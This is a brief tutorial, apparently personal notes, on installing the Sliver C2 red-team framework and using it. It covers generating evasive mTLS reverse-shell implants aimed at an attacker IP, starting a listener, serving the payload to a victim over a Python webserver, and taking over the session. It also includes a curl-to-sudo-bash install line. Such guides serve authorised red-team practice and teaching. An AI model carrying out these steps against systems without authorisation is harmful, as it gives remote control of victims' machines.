Sliver
Sliver is an open source project created and maintained by BishopFox as a multi-platform adversary emulation and red team tool. Sliver facilitates the generation of reverse connection payloads as EXE, DLL, or shellcode.
Installing
It has binaries for Windows, Linux, and macOS, allowing you to deploy Sliver C2 infrastructure on any system.
Pre-reqs
sudo apt install -y mingw-w64 binutils-mingw-w64 g++-mingw-w64
Running
Sliver can be downloaded from the Sliver repo, either with wget or directly.
Install on system
curl https://sliver.sh/install | sudo bash
Run it
sliver

Standalone release
wget https://github.com/BishopFox/sliver/releases/download/v1.4.14/sliver-server_linux.zip

Unzip the file
unzip sliver-server_linux.zip

Make it executable
chmod +x sliver-server
Run it
sudo ./sliver-server

Usage
Making a payload
To generate a payload you must know your IP address (the external one if the server is hosted externally). This will generate a randomly named executable file that can be delivered to targets in a variety of ways. The -m and -e flags used below select the mutual TLS (mTLS) connection to connect back on and evasion, respectively. The IP address entered is the IP address of your Sliver server.
generate -m (attacker ip) -e

The executable file will be in the folder where sliver was run.

Making .dll payload
generate --mtls (attacker ip) --format shared --skip-symbols
Starting The MTLS Listener
The listener must be started before the delivery and execution of the payload on a target system. This listener will display all active connections from target systems to your C2 server.
mtls

Exploit
Get the executable onto the victim. I'll do this via a quick python webserver.
python3 -m http.server 8008

When the server is being accessed and a file is being downloaded

On the victim machine go to the webserver and click on the file you want to download


Once it is executed, we should see the connection from the sliver terminal.

We can also check on active or alive sessions with the sessions command.

Connect to the session
sessions -i (session id)

Run whatever commands you may need/want:
